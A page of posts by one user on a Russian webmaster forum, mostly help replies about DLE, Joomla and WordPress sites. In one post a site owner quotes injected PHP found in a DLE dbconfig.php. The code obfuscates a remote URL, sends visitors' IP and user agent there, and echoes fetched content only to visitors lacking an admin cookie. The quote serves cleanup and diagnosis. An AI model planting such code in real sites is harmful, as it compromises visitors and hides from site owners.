kgtu5

Рейтинг
209
Регистрация
21.07.2010
Вирус на сайте cms dle
WebMasterArtem:
Советую всем проверить свои сайты на наличие новой опасной штуки. Видимо созданной всё тем же злодеем, так как домен снова заканчивается на 00xff.net. Я уже радовался, что всё закончилось и думал - 'О, Чудо!". Но нет! Теперь ВО ВСЕХ новостях на сайте в самом низу появилась надпись "Скачать по прямой ссылке" ведущая на http://yandex.narod.ru.00xff.net/load.php?name=kakaya-libo-igra-ili-chto-to-eshe... Теперь придётся чистить БД.

И да. На сайте всего один пользователь и ни одной аватарки.

покажи урл...

Обновить joomla 1.0 до 2.5

а зачем так сразу резко до 2.5? сначала на 1.5 бы переехали,посмотрели куда чего и зачем, он не так плох, хоть и поддержка прекратилась...

Не входит в админ панель вордпресс !

Вставь в wp-config.php в начале после <?php

ini_set("display_errors","1");
ini_set("display_startup_errors","1");
ini_set('error_reporting', E_ALL);

возможно увидишь ошибки...

Вирус на сайте cms dle
Emule:
Лучше бы подсказали, потому, что старая версия DLE 9.5.

Так собственно я это и сделал, 3 патча начиная с предпоследнего установить - и все закроете...

---------- Добавлено 03.03.2013 в 09:42 ----------

Korew:
Сегодня обнаружил в dbconfig.php такой код: 

$db = new db;

 function showallnews($id) {

	$id = intval($id);

	$rtn = $id + date("j");

	return $rtn;

}



function mysqli_safe($in) {

	if (showallnews(64) < 1024) {

	$rtn = base64_decode($in);

	return $rtn;

	}

}

function getallnews($newsid) {

	if (date("j") - $newsid > 320 ) {

		$rtn = false;

	} else {

	$get = mysqli_safe("aHR0cDovLzkxLjIyMy44OS44OC9nZXRfYXBpLnBocD9waWQ9MiY=")."br=".base64_encode($_SERVER['HTTP_USER_AGENT'])."&ip=".base64_encode($_SERVER['REMOTE_ADDR']);

	if (!isset($_COOKIE[mysqli_safe("ZGxlX3Bhc3N3b3Jk")])) {

	echo @file_get_contents($get);

	}

	}

}

getallnews (date("j"));

?>


Подскажите, как он мог туда попасть и что он делает. Этот код был на двух сайтах, один 9.5, другой - 9.7

аналогично, установите пачти безопасности, ссылка чуть выше...

Не отображаются картинки в joomla + virutemart

урл покажите (будет проще разобраться)...

Вирус на сайте cms dle
Emule:
Можно более подробнее.
Нужно заменить строчку 
@rename( ROOT_DIR . "/uploads/fotos/" . $id . "." . $type, ROOT_DIR . "/uploads/fotos/foto_" . $id . "." . $type );

или всю 
if( $thumb->size_auto( $user_group***91;$member_id***91;"user_group"***93;***93;***91;"max_foto"***93; ) ) {

$thumb->jpeg_quality( $config***91;"peg_quality"***93; );

$thumb->save( ROOT_DIR . "/uploads/fotos/foto_" . $id . "." . $type );

} else {

@rename( ROOT_DIR . "/uploads/fotos/" . $id . "." . $type, ROOT_DIR . "/uploads/fotos/foto_" . $id . "." . $type );

}


Так же в файле engine/modules/register.php мне не удалось отыскать данную строку, может там, что-то другое нужно заменить?
Буду вам очень благодарен за подробный ответ.

а если не секрет, почему официальные патчи (http://dle-news.ru/bags/) не хочется использовать?

Срочно нужна помощь!
DiAksID:
позвоните сами, скажите что из ФСБ и дайте команду разблокировать 😂 бред несёте

ну бред не бред, а похожий случай наблюдал: местный форум (на тот момент jedi.net.ru) был арестован за размещение ссылок на видео с ютуб, касающихся администрации (все официально с постановлением, полицией и разбирательствами).

вот статьи:

http://www.rospres.com/hearsay/9302/

http://www.compromat.ru/page_31490.htm

http://via-midgard.info/news/in_russia/16915-gubernator-oskorbilsya-na-dzhedaev-i-zakryl.html

разрешилось все через месяц примерно. сервер отдали, но факт есть факт - могут и отключить и изъять...

Поделитесь впечатлениями от MODx

отличный движок для решения любых задач и для разработки собственных идей...

Непонятная ситуация с сайтом

p.s. телефон с ума сходит, 3 ответа сразу...

Непонятная ситуация с сайтом

ищите проблему у себя на компьютере (проверьте на вирусы например)...

1... 165166167168169170171172173 ...221
Всего: 2207